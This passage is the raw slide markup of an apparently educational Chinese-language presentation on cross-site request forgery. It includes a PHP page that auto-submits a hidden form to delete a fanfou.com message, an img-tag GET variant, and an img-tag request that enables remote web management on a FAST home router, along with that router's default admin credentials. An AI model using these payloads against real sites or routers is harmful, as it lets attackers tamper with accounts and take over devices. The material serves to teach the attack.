              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>”被删了？！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58372" name="Picture 2" descr="D:\KnownSec\fanfou-2.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="857250" y="2524125"/>
            <a:ext cx="7439025" cy="3333750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="4714875"/>
            <a:ext cx="4929187"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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>问题出现在这个恶意站点的文件：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://xeye.us/lab/nice.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，代码如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$s = "&lt;form method='post' action='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://fanfou.com/home</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>'&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$s = $s."&lt;input type='text' value='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI1z1FVs59Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>' name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>' style='display:none!important;display:block;width=0;height=0' /&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$s = $s."&lt;input type='text' value='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg.del</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>' name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>' style='display:none!important;display:block;width=0;height=0' /&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$s = $s."&lt;/form&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>$s = $s."&lt;script&gt;document.forms[0].submit();&lt;/script&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>echo($s);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>?&gt;</a:t>
            </a:r>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>其实还可以这样：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;img src="http://api.fanfou.com/statuses/destroy.xml?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI1z1FVs59Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>两种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>方式删除消息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>伪造的删除请求来自恶意站点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>删除请求被目标站点执行之前，目标站点会检测是否有合法的身份验证标识（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>session/cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>被攻击者肯定不希望看到这样的结果。</a:t>
            </a:r>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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61443" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>还可以对本地网络设备进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61444" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="2500313"/>
            <a:ext cx="3190875" cy="3743325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61445" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4357688" y="3786188"/>
            <a:ext cx="4029075"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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62467" name="Picture 2" descr="D:\KnownSec\fast-0.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="2289175"/>
            <a:ext cx="7715250" cy="4140200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62468" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="1714500"/>
            <a:ext cx="7572375" cy="369888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>FAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>无线宽带路由器的管理界面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>远端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3214688" y="5572125"/>
            <a:ext cx="2428875" cy="500063"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="31000"/>
            </a:srgbClr>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63490" name="Picture 2" descr="D:\KnownSec\fast-1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="2286000"/>
            <a:ext cx="7643812" cy="4102100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63492" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="714375" y="1639888"/>
            <a:ext cx="7572375" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>在登录状态，被攻击者访问了带有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击代码的网页时，就“被迫”开启了“远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>管理”功能。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3071813" y="5500688"/>
            <a:ext cx="2428875" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击代码如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;img src=http://192.168.1.1/userRpm/ManageControlRpm.htm?port=80&amp;ip=255.255.255.255&amp;Save=%B1%A3+%B4%E6&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>方式发起的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>通过社工等手法让被攻击者访问恶意站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>FAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>无线宽带路由器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>管理的默认用户名与密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"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是什么</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>跨站请求伪造。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>、跨站点的请求；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>、请求是伪造的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>被攻击者的浏览器被迫向目标站点发起了伪造的请求，这个过程会带上被攻击者的身份验证标识（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" smtClean="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" smtClean="0"/>
              <a:t>）以通过目标站点的验证。从而借用被攻击者在目标站点上的权限进行一系列不被期望的操作。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3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>不一定需要浏览器：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自解压文件内执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>自解压文件如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>成功？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点存放了本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</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截图</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3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66563" name="Picture 2" descr="D:\KnownSec\rar-0.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="866775" y="1638300"/>
            <a:ext cx="741997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攻击</a:t>
            </a:r>
            <a:r>
